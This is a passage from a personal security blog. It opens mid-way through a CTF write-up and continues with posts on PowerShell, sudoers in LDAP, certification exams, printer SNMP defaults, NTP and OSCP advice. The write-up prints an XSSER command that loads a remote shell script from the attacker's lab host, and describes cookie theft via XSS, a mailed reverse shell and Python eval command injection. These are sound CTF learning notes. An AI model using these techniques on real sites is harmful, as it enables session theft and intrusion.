Mailing a script: In his own presentation Michael had stressed the importance of simulating human interaction in a CTF, be it through automation or by using a trainee ;) After the rather hamfisted hints in the Squirrelmail boxes we'd opened, Dick decided to look for a Powershell reverse-shell script and to mail it to the guy waiting for "a script to run". Not one minute before the final bell of the CTF did he get a reverse session! It didn't count for points, but that was a nice find of him. 

SQLi in the site: I ran the excellent SQLMap against all forms and variables that I could find in the site. No inroads found. 

XSS in the site: Michael pointed out that one variable on the site should catch my eye, so I went over it all again. Turns out that hoedan.php?topic= is susceptible to cross-site scripting. This is where I needed to start learning, because I'm still an utter newb at this subject. I expected some analogue of SQLMap to exist for XSS and I wasn't wrong! XSSER is a great tool that automates hunting for XSS vulnerabilities! Case in point:

xsser -u "http://www.pay-deal.nl" -g "/hoedan.php?topic=XSS" --auto --Fr "https://172.18.9.8/shell.js"
...
===========================================
[*] Final Results:
===========================================
- Injections: 558
- Failed: 528
- Sucessfull: 30
- Accur: 5 %

Here's a great presentation by the author of XSSER: XSS for fun and profit.

This could be useful! Which is why I tried a few avenues. Using XSSER, Metasploit and some manual work I determined that the XSS wouldn't allow me to run SQL commands, nor include any PHP. Javascript was the thing that was going to fly. Fair enough. 

Now, that website contained a contact form which can be used to submit your own website for inclusion in the payment network. Sounds like a great way to get a "human" to visit your site. 

Browser_autopwn: At first, I used SEToolkit and MSF to run attacks like browser_autopwn2, inserting my own workstations webserver and the relevant URL into the contact form. I certainly got visits and after some tweaking determined that the user came from one of the workstations and was running FireFox 51. Unfortunately, after trying many different payloads, none of them worked. So no go on pwning the browser on the workstation. 

Grabbing dashboard cookies: Another great article I found helped me get on the way with this one: From reflected XSS to shell. My intention was to have the pay-deal administrator visit their own site (with XSS vuln), so I could grab their cookie in hopes of it having authentication information in there. Basically, like this:

http://www.pay-deal.nl/hoedan.php?topic=Registreren”>

While the attack worked and I did get a cookie barfed onto my Netcat listener, it did not contain any authenticating information for the site:

===========================================
connect to [172.18.9.8] from (UNKNOWN) [172.18.8.10] 55469
GET / HTTP/1.1
Host: 172.18.9.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
=========================================== 

Turns out I probably did something wrong, because according to Michael's post-CTF talk this was indeed the inroad to be taken: grab the admin's cookie, login to the dashboard, grab more credit cards and abuse the file upload tool for more LFI fun! Similarly, Dick's attempts at the SMB relay should have also given him inroads to attack the box. We were well on our way, after a bunch of hints. So, we're still pretty big newbs :D

It was an awesome day! I wish I had more spare time, so I could continue the PWK/OSCP online labs and so I could play around with HackTheBox and VulnHub.

EDIT: Here's a great SANS article explaining SMB relay in detail.


kilala.nl tags: , ,

View or add comments (curr. 0)

Back in the saddle:CompTIA PenTest+

2018-03-25 20:54:00

It's been a few months since I last took a certification exam: I closed last year with a speed-run of RedHat's EX413, which was a thrill. Since then, I've taken some time off: got into Civ6, read a few books, caught up on a few shows. But as some of my friends will know, it's never too long before I start feeling that itch again... Time to study!

A few weeks back I learned of the new CompTIA PenTest+ certification. They advertised their new cert with a trial run for the first 400 takers. A beta-test of an exam for $50?! I'm game! Sounds like a lot of fun!

Judging by the reactions on TechExams and Reddit, the test is hard to pin down. CompTIA themselves boast "a need for practical experience", while also providing a VERY extensive list of objectives. Seriously, the list is huge. Reports from test-takers are also all over the place: easy drag-and-drop "simulations", large swathes of multiple-choice questions, a very large focus on four of the big names in scripting, "more challenging than I had expected", or "what CEH should have been".

As for me, my test is booked for 16/04. I don't fully know what to expect, but I intend to have fun! In the mean time I'm using the large list of objectives to simply learn more abou the world of pentesting. My OSCP-certification suggests that I at least understand the basics, but to me it's mostly shown me how much I don't know :) 


kilala.nl tags: ,

View or add comments (curr. 0)

PasswordState, Active Directory and Sudo: oh my!

2018-01-10 20:14:00

Recently I've gone over a number of options of connecting a Linux environment in an existing Active Directory domain. I won't go into the customer's specifics, but after considering Winbind, SSSD, old school LDAP and commercial offerings like PBIS we went with the modern-yet-free SSSD-based solution. The upside of this approach is that integration is quick and easy. Not much manual labor needed at all. 

What's even cooler, is that SSSD supports sudoers rulesets by default!

With a few tiny adjustments to your configuration and after loading the relevant schema into AD, you're set to go! Jakub Hrozek wrote instructions a while back; they couldn't be simpler!

So now we have AD-based user logins and Sudo rules! That's pretty neat, because not only is our user management centralized, so is the full administration of Sudo! No need to manage /etc/sudoers and /etc/sudoers.d on all your boxen! Config management tools like Puppet or Ansible might make that easier, but one central repo is even nicer! :D

 

 

Now, I've been working with the PasswordState password management platform for a few weeks and so far I love it. Before getting the logins+Sudo centralized, getting the right privileged accounts on the Linux boxen was a bit of a headache. Well, not anymore! What's even cooler, is that using Sudo+LDAP improves upon a design limitation of PasswordState!

Due to the way their plugins are built, Click Studios say you need -two- privileged accounts to manage Linux passwords (source, chapter 14). One that has Defaults:privuser rootpw in sudoers and one that doesn't. All because of how the root password gets validated with the heartbeat script. With Sudoers residing in LDAP this problem goes away! I quote (from the sudoers.ldap man-page):

It is possible to specify per-entry options that override the global default options. /etc/sudoers only supports default options and limited options associated with user/host/commands/aliases. The syntax is complicated and can be difficult for users to understand. Placing the options directly in the entry is more natural.

Would you look at that! :) That means that, per the current build of PasswordState, the privileged user for Linux account management needs the following three sudoers entries in AD / LDAP. 

CN=pstate-ECHO,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/echo
sudoOption = rootpw
sudoUser = pstate

CN=pstate-PASSWDROOT,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd root
sudoOption = rootpw
sudoOrder = 10
sudoUser = pstate

CN=pstate-PASSWD,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd *
sudoUser = pstate

The "sudo echo" is used to validate the root password (because the rootpw option is applied). I only applied the rootpw option to "sudo passwd root" to maintain compatibility with the default script included with PasswordState


kilala.nl tags: , ,

View or add comments (curr. 1)

EX413: it's been one heck of a ride!

2017-11-01 20:39:00

2017-11-02: Updates can be found at the bottom.

Five weeks ago, I started a big challenge: pass the RedHat EX413 "certificate of excellence" in Linux server hardening. I've spent roughly sixty hours studying and seven more on the exam, but I've made it! As this post's title suggests it's been one heck of a ride!

Unfortunately, that's not just because of the hard work. 

I prepared for the exam by following Sander van Vugt's Linux Security Hardening video training, at SafariBooks Online. Sander's course focuses on both EX413 and LPI-3 303, so there was quite some material which did not apply to my specific exam. No worries, because it's always useful to repeat known information and to learn new things. Alongside Sander's course I spent a lot of time experimenting in my VM test lab and doing more research with Internet resources. Unfortunately I found Sander's course to be lacking content for one or two key areas of EX413. We have discussed the issues I had with his training and he's assured me that my feedback will find its way into a future update. Good to know. 

Taking the exam was similar to my previous RedHat Kiosk experiences. Back in 2013 I was one of the first hundred people to take a Kiosk exam in the Netherlands (still have the keychain lying around somewhere) and the overall experience is still the same. One change: instead of the workstation with cameras mounted everywhere, I had to work with a Lenovo laptop (good screen, but tiny fonts). The proctor via live chat was polite and responded quickly to my questions.

Now... I said I spent seven hours on the exam: I took it twice. 

Friday 27/10 I needed the full four hours and had not fully finished by the time my clock reached 00:00. This was due to two issues: first, Sander's course had missed one topic completely and second, I had a suspicion that one particular task was literally impossible. Leaving for home, I had a feeling that it could be a narrow "pass". A few hours later I received the verdict: 168/300 points, with 210 being the passing grade. A fail.

I was SO angry! With myself of course, because I felt that I'd messed up something horribly! I knew I hadn't done well, but I didn't expect a 56% score. I put all that anger to good use and booked a retake of the exam immediately. That weekend I spent twelve hours boning up on my problem areas and reviewing the rest.

Come Monday, I arrived at the now familiar laptop first thing in the morning. BAM! BAM! BAM! Most of the tasks I was given were hammered out in quick succession, with a few taking some time because of lengthy command runtimes. In the end I had only one task left: the one which I suspected to be impossible. 

I spoke to the proctor twice about this issue. The first time (1.5 hours into the test) I provided full details of the issue and my explanation for why the task is impossible. The proctor took it up with RedHat support and half an hour later the reply was "this is as intended and is a problem for you to solve". Now I cannot provide you with details about the task, so I'll give you an analogy instead. Task: "Here's a filled-out and signed form. And over here you will find the personnel files for a few employees. Using the signature on the form, ascertain which employee signed the form. Then use his/her personal details to set up a new file.". However, when inspecting the form, you find the signature box to be empty. Blank. There is no signature. 

After finishing all other work I spoke to the proctor again, to reiterate my wish for RedHat to step in. The reply was the same: it works as intended and complaints may be sent to certification-team@. Fine. Since I'd finished all other tasks (and rebooted at least six times along the way to ensure all my work was sound), I finished the exam assuming I'd get a passing score anyway. I felt good! I'd had a good day, banged out the exam in respectable time and I had improved upon my previous results a lot!

I took their suggestion and emailed the Cert Team about the impossible question. Both to help them improve their exams and to get a few extra points on my final score.

A few hours later I was livid.

The results were in: 190/300 points: 63%, where 70% is needed for a pass. All my improved work, with only one unfinished task, had apparently only led to 22pts increase?! And somewhere along the way RedHat says I just left >30% of my points lying around?! No fscking way. 

I sent a follow-up to my first email, politely asking RedHat to consider the impossible assignment, but also to give my exam results a review. I sincerely suspect problems with the automated scoring on my test, because for the life of me I cannot imagine where I went so horribly wrong to miss out on 30% of the full score!

This morning, twentyfour hours after my last email to the Cert Team, I get a new email from the RH Exam Results system. My -first- exam was given a passing score of 210/300. No further feedback at all, just the passing score on the first sitting. 

While I'm very happy to have gotten the EX413, this of course leaves me with some unresolved questions. All three have been fired in RedHat's direction; I hope to have some answers by the end of the week. 

 

In closing I'd like to say that, despite my bad experiences, I still value RedHat for what they do. They provide solid products (RHEL, IDM/IPA and their many other tools) and their practical exams are important to a field of work rife with simple multiple-choice questions. This is exactly why my less-than-optimal experience saddens me: it marrs the great things Redhat do!

 

Update 2017-11-02:

This morning I received an email from the Certification Team at RedHat, informing me that my report of the bugged assignment was warranted. They had made an updates to the exam which apparently had not been fully tested, allowing the problem I ran into to make it into the production exams. RedHat will be A) updating the exam to resolve the issue B) reissuing scores for other affected candidates. 


kilala.nl tags: , ,

View or add comments (curr. 12)

EX413 prep: my cheat sheet

2017-10-29 12:56:00

I used Sander van Vugt's EX413/LPI3 video training to prep for my EX413 exam and expanded upon all that information by performing additional research. All in all, I've spent roughly sixty hours over the past five weeks in order to get up to speed. Over the course, over fifty pages of notes were compiled. :)

I've extract all the really important information from my notes, to make this seven-page EX413 cheat sheet. I hope other students find it useful.

Of course, this is NO SUBSTITUTE for doing your own studying and research. Be sure to put in your time, experimenting with all the software you'll need to know. The summary is based on my own knowledge and experience, so I'm sure I've left out lots of things that other people might need to learn.


kilala.nl tags: , ,

View or add comments (curr. 0)

RHEL / CentOS / Fedora: NetworkManager or dhclient messing with network and DNS settings?

2017-10-28 08:53:00

In my test networks at home I've often run into issues with NetworkManager or dhclient messing with my network settings, most importantly the DNS configuration. Judging by the hundreds of StackExchange and other forum posts to the same effect, I'm certainly not alone. The fact that this seems like such a newbie problem just makes it all the more annoying. 

I've tried many changes, based on those forum discussions, such as:

And funnily enough, things would still be changing my /etc/resolv.conf every time networking was restarted.

Turns out that I am in fact making a RedHat-newbie mistake! I'm stuck in my old ways of manually micro-managing specific settings of a Linux box. I'm so stuck that I've forgotten my lessons from the RHCSA certification: system-config-network-tui

That tool is great at resetting your network config and overwriting it with the exact setup you want. It helps clear out any settings in odd places that might lead to the continuous mucking about with your settings. 


kilala.nl tags: , ,

View or add comments (curr. 0)

PvIB CTF 2017: pen.test event

2017-10-08 10:29:00

the scoreboard

For the third year in a row I competed in the PvIB CTF "Pen.test event", a Jeopardy-style CTF where contestants race to solve puzzles and small hacking challenges. Last year I didn't fare very well at all, but this time aroud things went great! The crowd was nice, my table companions were cool, it was great talking to Anko again and the DJ played awesome beats. I had a blast!

Around 1.5 hours into the competition I went to stretch my legs and get a drink, enjoying the fun we were having. Looking around, sipping on my cola I noticed something odd about the scoreboard! When I'd managed to grab my phonecam I'd already been surpassed by one team, but for at least a short while I'd managed to be in #4 out of the pack of 51 contestants. In the end I finished somewhere halfway , because greater minds than mine managed to keep on scoring points :)

pvib ctf scoreboard

Like before, the challenges were divided into various categories (shown above) and ranked from easy to hard, resulting in different scores per item. I finished the night with 100.000 points (3x10e3, 2x10e4, 1x10e3). I was so, so close on another 10k and 30k points which is why I stuck around until the very last minute!

Web:

  1. I let myself be fooled by the easy Web challenge for way too long. The challenge presented you with a SquirrelMail login page and the task to login and get their email. Assuming it was a veritable SquirrelMail, I assumed no easy software vulnerabilities would be found, so I resorted to password guessing. An hour before the end of the night, Anko asked me "When we start out web pen testing, what are the things you're taught first?". Me: "Well... I reckon... You mean XSS, CSRF and SQL Injection, right?" A: "Absolutely." Me: "Sonuvabitch...". Turns out it was NOT SquirrelMail, just a quick and easy SQLi exercise made to look like it. 
  2. This challenge sent you to an online calculator which would help the voting committee tally their votes, in this case a basic formula line which would return the outcome. Entering gibberish into the line would return a basic Python EVAL failure. Turns out that it was possible to run OS-commands through the EVAL calculation line, which let me list the remote files and to grab the required flag.
  3. Both this exercise and #2 were a bit slow to respond in my browser, so I turned to the Lynx text-based browser. This foregoes all CSS, which was being loaded from the Internet. This time around we were supposed to hack a voting system, to find out the vote-total for each candidate. I noticed that it was based on a JSP that got included by URL, so I downloaded it for further analysis. This code showed me that the voting process makes SOAP calls to retrieve candidates and to place a vote. I also gave me examples of the XML data needed for those soap calls. From here on out, my challenge was to find out how to get voting results instead! I haven't worked with SOAP a lot, but I know there had to be some way of querying the remote end for available procedures and commands. This is where I learned about WSDL, which gave me exactly what I needed: a description of how to request voting results. This needed a little bit more tweaking to the XML, because the candidates were identified by an MD5 hash that needed to be updated as binary data. Darn! Was this close to getting the whole challenge, but was a few minutes too late. 

Learning on the go was hella fun! I got to renew my experience with CURL calls and XML data and learned new things about SOAP. Nice!

Crypto:

  1. I'd figured out the positional encryption scheme for this challenge pretty quickly, as it was clearly based on jumping and looping through the ASCII table, based on a character's position. Despite this, I seem to have had some stupid mistake in my method, because my decrypted text was repeatededly rejected. Again, this close to cracking it, but too little too late. 
  2. We were provided with two enigmatic strings and an encrypted ZIP file. Had no idea how to proceed with this one just yet.
  3. We're provided with Python code for a home-brew crypto, as well as some sample data. Given enough time I'm sure I could have figured out the issue at hand, but in this case ${ENOUGH_TIME} would -GT 2d. So never mind ;)

Cracking crypto never was my strong point ;)

Forensics:

  1. We're given a .CRT certificate for a voting machine, which supposedly is fishing. Making it legible with the OpenSSL command line quickly shows the PvIB CTF flag.
  2. We're given a .DOCX file which was supposed to contain suspicious data. I simply used unzip to extract all the components files of the Word document and searched the various XML contents for the CTF flag. 
  3. We're given a .PNG image that supposedly contains hidden data. One ZSteg install later I have my flag. 

Fun challenges! Not too hard so far.

Misc.:

  1. A PDF file with some hidden data in it. Open the PDF with the viewer on my Kali box made it stand out as a fat blue box. Anko simply grepped for "-i pvib" through the strings-output of the PDF and fared just as well :)
  2. Oooff! I wish I'd had my wife with me! She's great at logical reasoning :) This challenge combined logic (determine whether persons A, B and C are lying or tell the truth), math (Fibonacci and Harshad numbers) and programming (because there's no plausible way of quickly solving the puzzle on paper). Seeing how I can't ever get my ideas straight with the liars/truthers, I skipped this one after about half an hour. 

What a great evening! Better yet, on the way home I managed to get on the Slam! night show and I won a DAB+ radio for our home! :D Awesome-cakes!


kilala.nl tags: , ,

View or add comments (curr. 0)

WTF HP? Your M203dn laser printer defaults to open SNMP write?!

2017-10-04 18:13:00

screenshot from the web interface

We've just bought a new laser printer, mostly for my daughter's schoolwork. Installation was a snap as both Windows and MacOS have made it a fool-proof process. MacOS even gave me a button labeled "Visit printer website"! Of course that's gonna pique my interest!

Yup, the HP Laserjet Pro M203dn (as it's fully named) has a wonderfully helpful web interface! By default, there's no username or password, there's no login prompt whatsoever. Just open for everyone to browse. Which is where I stumble upon the screenshot I'm showing above. Of course the SNMP community strings default to public/public. Why not? But who in the seven hells decided to make that SNMP daemon -writable-?! That's asking for trouble!

... aside from the "no username or password on the admin panel" of course. Ye gods! O_o

Oh and of course the certificate on the https web server was not signed by HP's CA. Because of course I wouldn't want to verify that nobody messed with the firmware or the certs on the printer. 

... *checks around* Yep, HP also don't have a bug bounty program. =_=


kilala.nl tags: ,

View or add comments (curr. 1)

EX413 prep: messing with FreeIPA, Apache Directory Studio and MacOS

2017-10-01 21:44:00

Messing with FreeIPA

In preparation for my upcoming EX413 examination, I'm mucking about with FreeIPA

FreeIPA is a easy-to-setup solution for building the basis of your corporate infrastructure on Linux. It includes an LDAP server, it sets up DNS and a CA (certificate authority) and it serves as Kerberos server. Basically, it's a light version of Active Directory, but targeted at Linux networks. Of course Linux can use AD just fine, but if you don't have AD FreeIPA is the next best thing.

IPA has come a long way over the past ten years. It might still not be fully featured, but it certainly allows you to setup a centralized RBAC platform, not unlike the BoKS product range I've worked with. BoKS offers more functionality (like a password safe and the possibility to easily filter SSH subsystems like allowing SCP or SFTP only), but it's also far from free. 

I'm currently doing exactly what EX413 exams want you to be able to do: install a basic FreeIPA environment, with some users and some centralized SUDO rules. It's the latter that was giving me a little bit of a headache, because I had a hard time figuring out the service account to use for the bind action. Sander van Vugt's training video refers to the service account uid=sudo,cn=sysaccounts,dc=etc,dc=ex413,dc=local, which does not appear to exist out of the box. 

This set me off one a foxhunt that lasted 1.5 hours.

Because this is a sandbox environment, I've set up one account as both the SUDO bind user in /etc/sudo-ldap.conf and in the ADS user interface. Both now work swimmingly! I can "sudo -l" as a normal user and I can mess around the LDAP tree from the warmth and comfort of my MacOS desktop :)

EDIT:

Well I'll be a monkey's uncle! That little rascal of a UID=sudo was hiding inside LDAP all along! I guess I really did make a mistake in my initial ldappasswd command :D Well, at least I learned a thing or two!

EDIT 2:

FOUND IT! The OID I showed up top has an "s" too many! I wrote "sysaccountS", while it's supposed to be "sysaccount". Ace! That's going to make life a lot easier during the exam :)  


kilala.nl tags: , ,

View or add comments (curr. 0)

Speedrunning Redhat's EX413 exam

2017-09-21 15:16:00

booking confirmation

Over the past few weeks, I've been setting up a pen-testing coaching track for ITGilde. I'd planned my agenda for Q3/Q4/Q1 accordingly and had even accepted that my RHCSA and RHCE certifications would lapse in November. Unfortunately I couldn't get enough students together for this winter, so I'm putting the coaching track off until next spring. Huzzah, this frees up plenty of time for studying!

So... Now I'd like to try and retain my Redhat certs, for which I've worked so hard! My deadline's pretty close though, as November's right around the corner. After some investigation I concluded that the most productive way for me to retain these certs, would be through passing one of the RHCA exams. EX413, pertaining to server security, is right up my alley! So, I'll be speedrunning the EX413 studies, trying to finish it all in five weeks time!

I love a good challenge! ^_^


kilala.nl tags: , ,

View or add comments (curr. 2)

Building an on-premise Stratum-1 NTP server

2017-08-11 13:59:00

Recently I've been poking around NTP time servers with a few friends. Our goal was to create an autonomous, reliable and cheap NTP box that could act as an on-premise, in-house Stratum-1 time server. In a world filled with virtual machines that don't have their own hardware clocks, but whose applications demand very strict timekeeping, this can be a godsend.

I could write pages upon pages of what we've done, but the RPi Fatdog blog has a great article on the subject

Using just one Raspberry Pi and a reliable RTC (real-time clock) module you can create an inexpensive time server for your network. The RTC they're referring to supposedly drifts about a minute per year; still not awesome, but alright. *

This setup works well and Windows servers will happily make use of it! Linux NTP clients and other, stricter NTP software will balk at the fact that your Stratum-1 box was never synchronized with another time source. This is proven by the ntpdate command refusing to sync:

$ ntpdate timeserver
4 Mar 12:27:35 ntpdate[1258]: no server suitable for synchronization found

If you turn on the debugging output for ntpdate, you'll see an error that the reference time for the host is in 1900, which is the Epoch time for NTP. The example below shows reftime (though not in 1900):

ntpq>rv
status=0664 leap_none, sync_ntp, 6 events, event_peer/strat_chg
system="UNIX", leap=00, stratum=2, rootdelay=280.62,
rootdispersion=45.26, peer=11673, refid=128.4.1.20,
reftime=af00bb42.56111000  Fri, Jan 15 1993  4:25:38.336, poll=8,
clock=af00bbcd.8a5de000  Fri, Jan 15 1993  4:27:57.540, phase=21.147, freq=13319.46, compliance=2

The quick and easy work-around for this issue is to simply create both Stratum-1 and 2 in-house :) Have one RPi run as S-1, with 2 or 3 RPis working as S-2, that sync their time off the S-1 and who are peered among themselves. Any NTP client will then happily accept your S-2 boxes as NTP source. 

Better than nothing! And cheap to boot. 

 

*: Remi Bergsma wrote an interesting article about Raspberry Pi clock accuracy, with and without RTC.


kilala.nl tags: , ,

View or add comments (curr. 0)

MacOS, Steam and legacy controllers

2017-06-27 06:39:00

Ten years ago, almost to the day, we bought a Playstation2 to play rhythm games like DDR and Guitar Hero. The console and its games have long since been relegated to storage, but one of the DualShock controllers is still with us in the living room. Our friend Baris once gifted us a LikSang SmartJoy Playstation2-to-USB converter, which I've been using in OpenEmu to play classic SNES games with my kid. 

In this month's Steam Summer Sale I grabbed two great games, "Ori" and "Hollow Knight", which play better using a controller. Unfortunately they don't recognize the SmartJoy out of the box, so I had to do some research. "JoystickMapper" to the rescue! It'll work with just about any controller and can be used to map buttons to keyboard actions, which most Mac and PC games support. Now I won't have to shell out bucks for a new controller! /o/ Well worth the five euros for JoystickMapper.


kilala.nl tags: ,

View or add comments (curr. 0)

Starting something new - SLAE: SecurityTube Linux Assembly Expert

2017-06-22 19:48:00

The ecstacy of achieving the OSCP certification didn't last long for me. Sure, I'm very happy and proud that I passed, but not two days later I was already yearning to move on! I wanted to get back to the PWK Labs, to finish the other thirty-odd servers. I wanted to retake the exam a second time. I wanted more challenge! So I set to making a list!

As something inbetween, I've signed up for SecurityTube's SLAE course: they teach you basic x86 assembly programming, to build and analyze Linux shellcode. Sounds very educational! And at only $150 for the course and exam it's a steal! I'll be blogging more about this in the future :)

Signing up for the course went easily and I got all the details within a day. However, actually getting the course files proved to be a struggle! There are three ZIP files, totalling roughly 7GB. They're stored in Amazon S3 buckets, which usually implies great delivery speeds. However, it seems that in this case SecurityTube have opted not to have any edge locations or POPs outside their basic US-WEST location. This means that I was sucking 7GB down a 14kbps straw :( That just won't do! Downloads were horribly slow!

After doublechecking that the issue did not lie with our home network, I attempted to download the files using my private server in the US: speeds were great. However, downloading from my own server wasn't much faster. Darn. Maybe there's another hickup? Two of my colleagues suggested using a VPN like PIA; sure that's an option. But I've been meaning to look into Amazon's AWS service, which allows you to quickly spin up virtual machines across the globe, so I went with that. 

I built a basic Ubuntu server in Frankfurt and downloaded the files from the US. Seeing how both the source and destination were on Amazon's network, that went perfectly fine. Grabbing the files from my Frankfurt system also went swimmingly. So after two days of bickering I finally have the course files on my laptop, ready to go :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

OSCP: more questions

2017-05-25 18:12:00

Here's another question I've had a few times, which came to me again this weekend:

"I'm really surprised you had the confidence to tackle the exam with just 19.

Is this you bread and butter ? Was this simply to formalize existing knowledge for you ?"

To be honest, I was just as surprised that I passed! No, I don't have workexperience in the field of pen-testing; I've only done two or three CTFs.

My original intention with my exam was to consider it a recon missions for my second exam. I was sure that 19 out of 55+ hosts was not enough to be prepared for the exam. I went into the exam fully reconciled with the idea that failing was not just an option, but all but assured. The exam would be a training mission, to learn what to expect. 

The day before my exam I had practiced exploiting a known buffer overflow in EasyRMtoMP3Converter (EXE). Here's the CoreLan writeup from 2009. Using the approach I learned during the PWK class and by studying various published exploits, I built my own Python script to exploit the software. After some additional work, the code worked against both Windows 7 and XP. 

This extra practice paid off, because I managed to finish the BOF part of the exam within two hours. This was basically the wind in my sails, what got me through the whole exam. After finishing the BOF I dared to hope that I might actually have a chance :) And I did. 


kilala.nl tags: , ,

View or add comments (curr. 0)

OSCP: Is the Pentesting With Kali (PWK) course worth it?

2017-05-23 14:07:00

One of my past colleagues reached out to me today, asking me this:

I'm still OSCP-wannaby, but probably it is too technical for me. I'm still not sure. Could you please share if a pre-exam training is worth its price or what is your practical - cutting of 'try harder' ;-) - advice to pass it?

I'll post my reply here, because I've been telling people this very thing for the past few weeks.

I've always thought OffSec's online PWK training to be well worth the money! $1150 gets you a huge PDF with all the course work, a few hours of videos and 90 days of lab access. It also includes your first exam attempt. For a training of this quality, that's really not a lot of money! You could even opt to pay even less, getting only 30/60 days of lab access.

The classroom variant is something else entirely though. It's a LOT more expensive, at roughly $6000. That's for a week's on-site training, including a CTF event on one night. You also get the same PDF and videos, the included exam, but only 30 days of lab access. For me, it was well worth it because it was five days of non-stop hacking in a room with 30 other students and two top-notch trainers.  

Something that saved me time and money: during the classroom training you receive the two most important VMs, which you can use on your OWN laptop. Thanks to that, I didn't have to start my lab access until I'd finished >90% of my exercises. In the online PWK you use lab access to work on your exercises!  

The course is always worth it before taking the exam: submitting a proper report of your coursework may net you 5 bonus points on the exam. Submitting a pen-test report for the labs may net you a further 5 bonus points. On a minimal passing score of 70, those 10 points can really help a lot!  

So yeah. Definitely work through all the coursework to get into it and score points. Then play a lot in the labs, for both practice and more points. Then take the exam when your time's up. Always do the exam! Because if you fail your exam and then renew your labs, OffSec will include a "free" retake of your exam with the new lab time! Totally worth it! That way your "failed" exam because a recon mission that teaches you a lot!


kilala.nl tags: , ,

View or add comments (curr. 0)

Hooray for Google's free projects

2017-05-11 21:04:00

A few weeks ago, I reopened commenting on this site after having it locked behind logins for years. Since then the amount of spam submissions have been growing steadily. Sucks, so I finally took the time to implement proper spam checking. Enter Google's free project reCaptcha. Of course I realize that, if something's free on the web, it probably means that I'm the product being sold. I'll have to poke around the code to see what it actually does :)

CodexWorld have a great tutorial on getting reCaptcha to work in a basic script. Took me less than an hour to get it all set up! Lovely!


kilala.nl tags: ,

View or add comments (curr. 3)

I love Microsoft's documentation!

2017-05-09 10:24:00

Four Windows servers on one laptop

A bit over a year ago I first started working with Microsoft's Active Directory, integrating it with BoKS Access Control. At the time, I was impressed by Windows Server 2012 and 2016 and the ease with which I could set up an AD forest with users. 

I'm now learning how to build a two-tier PKI infrastructure, after seeing them in action at various previous clients. I've been on the consuming end of PKI for years now and I thought it was time to really know how the other end works as well! I must say that I love Microsoft's generosity when it comes to documentation! Not only do they provide proper product docs, but they also have online tutorials in the form of TLGs: test lab guides. Using these, you can self-teach the basics of a subject, and then build up from there.

The 2012 Base TLG helps you build a basic AD forest of systems. I can follow it up with the two-tier PKI infrastructure TLG, which helps me set up an offline root CA, and an issuing CA, along with automatically enrolling any new systems in the networkt that need SSL certs. Awesome!

I'm similarly extatic about the performance of my Macbook Air. It's a tiny, super-portable system, but it still doesn't balk at running my usual applications plus four full-fledged Windows Server 2012 hosts. Nice!

EDIT:

Ammar Hasayen also did a nice write-up, which appears to be based upon the two-tier PKI TLG but which adds additional details.

Also, Microsoft also offer a third great resource, their MVA: Microsoft Virtual Academy. They also have a course on two-tier PKI with ADCS


kilala.nl tags: , ,

View or add comments (curr. 0)

Learning Powershell? Mind your flags!

2017-05-09 08:54:00

I can't believe such a small, silly thing had me going for ten minutes!

When trying to retrieve a signed certificate from my ADCS rootCA, I kept getting a "file not found" error:

> certreq retrieve 2 .subCA.corp.contoso.com_subCA.crt
: The system cannot find the file specified. 0x80070002 (WIN32: 2)

Googling didn't lead to many results, but then I realized: Windows commands need to discern between variables and values, just like any OS. Doh! Forgot the minus!

>  certreq -retrieve 2 .subCA.corp.contoso.com_subCA.crt

Works just fine! 


kilala.nl tags: , ,

View or add comments (curr. 0)

PWK and OSCP: pointers and advise

2017-05-07 14:38:00

It's traditional to do a huge writeup after finishing the OSCP certification, but I'm not going to. People such as Dan Helton and Mike Czumak have done great jobs outlining the whole process of the course, the exercises, the labs and the exam. So I suggest you go and read their reviews. :)

In the mean time, here are the few things I would suggest to anyone undertaking PWK+OSCP. 

The day after finishing the exam was one of elation: I couldn't be more happier. But not a day later, I'm already missing the grueling work! I want to go back to the labs, to finish the remaining 30+ servers I hadn't cracked yet. I even want to retake the exam, to get more challenges! 

For now, my plan is as follows:

  1. First, I'm going to study to upgrade my RHCSA and RHCE to RHEL7.
  2. When I'm between assignments again, I will invest in more PWK labtime to practice with more target hosts. 
  3. Once I have finished the labs I will continue my journey with OffSec's CTP (Cracking The Perimeter) course and the OCSE exam. 

Back in college, René was right: "That guy just doesn't know the meaning of the word 'relaxation'."


kilala.nl tags: , ,

View or add comments (curr. 2)

OSCP exam: done and dusted

2017-05-03 15:34:00

Sorry for posting in Dutch :) This is an ad verbatim quote from a forum post I made today; just a braindump of how my past day went. 

Wie is er gaar? Ik is er gaar! /o/

Ik heb m'n OSCP examen achter de rug! Dat ging eigenlijk een heel stuk beter dan verwacht :D

Het liefste was ik gisteren rond 0700-0800 begonnen, maar het vroegste timeslot dat ze je bieden is vanaf 1100. Ik had dus van 1100 gisteren tot zo'n 4 uur geleden de tijd voor het aanvallen van mijn doelwitten. Daar naast had ik van 1100 vanochtend tot morgen 1100 de tijd om mijn testrapport op te stellen en in te leveren. NOU! Het is een hele slag geweest, maar het zit er op. Ik ben uiteindelijk zo'n 21 uur in touw geweest.

M'n taktiek was om op de achtergrond een berg scans af te trappen, zodat ik me bezig kon houden met de bak waar geen scan voor nodig was: de buffer overflow oefening. Rond middernacht had ik in principe genoeg punten binnen om te slagen, dus bedtijd!

Maar helaasch :D Ik kon door de adrenaline de slaap niet vatten! Om 0200 er weer uit gegaan en verder gegaan. Rond 0300 ging ik m'n eindrapport vast opstellen. Om half zeven was die zo'n beetje klaar! Ik heb nog wat tijd gestoken in die laatste privesc, maar niets meer gevonden. Ik was om half negen zo gaar, dat ik't best vond! Ik heb al m'n documentatie verzameld, nog één keer alles goed nagekeken en ingezonden. 

Douchen en instorten! Geslapen tot een uur of elf en voel me nu al een stuk beter! :)

Ik had helemaal niet verwacht dat ik zo ver zou komen! Tussen alle verhalen op de OffSec forums, van mensen die helemaal dichtslaan en mijn eigen ervaringen uit het verleden, had ik niet verwacht meer dan één bak te kraken. Maar met wat ik heb bereikt heb ik an sich al genoeg punten om te slagen en ik hoop natuurlijk ook op de 5+5 bonuspunten voor de lab rapporten die ik indien. 

